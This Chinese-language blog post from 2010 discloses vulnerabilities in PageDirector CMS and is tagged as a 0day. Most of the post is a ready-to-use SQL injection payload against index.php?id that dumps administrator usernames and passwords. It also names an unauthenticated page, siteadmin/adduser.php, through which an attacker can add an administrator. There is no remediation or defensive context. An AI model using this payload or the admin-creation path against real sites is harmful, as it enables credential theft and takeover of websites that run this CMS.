PageDirector CMS 存在多处漏洞 | SpookZanG

首页 > 脚本相关 > PageDirector CMS 存在多处漏洞

PageDirector CMS 存在多处漏洞

2010年6月29日 spookzang 发表评论阅读评论

作者：Tr0y-x

漏洞介绍:
1、SQL注入漏洞

http://[SpookZanG]/[path]/index.php?id=[SQL]

[SQL]=UnIoN+aLl+seLECt+group_concat(username,0x3e,password)+from+admin–

2、直接添加管理员

http://[SpookZanG]/[path]/siteadmin/adduser.php?mode=Add

分类: 脚本相关标签: 0day, CMS, SQL, 漏洞

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

Subdreamer Pro 上传任意文件漏洞 Adobe宣布这周将修复Reader和Acrobat漏洞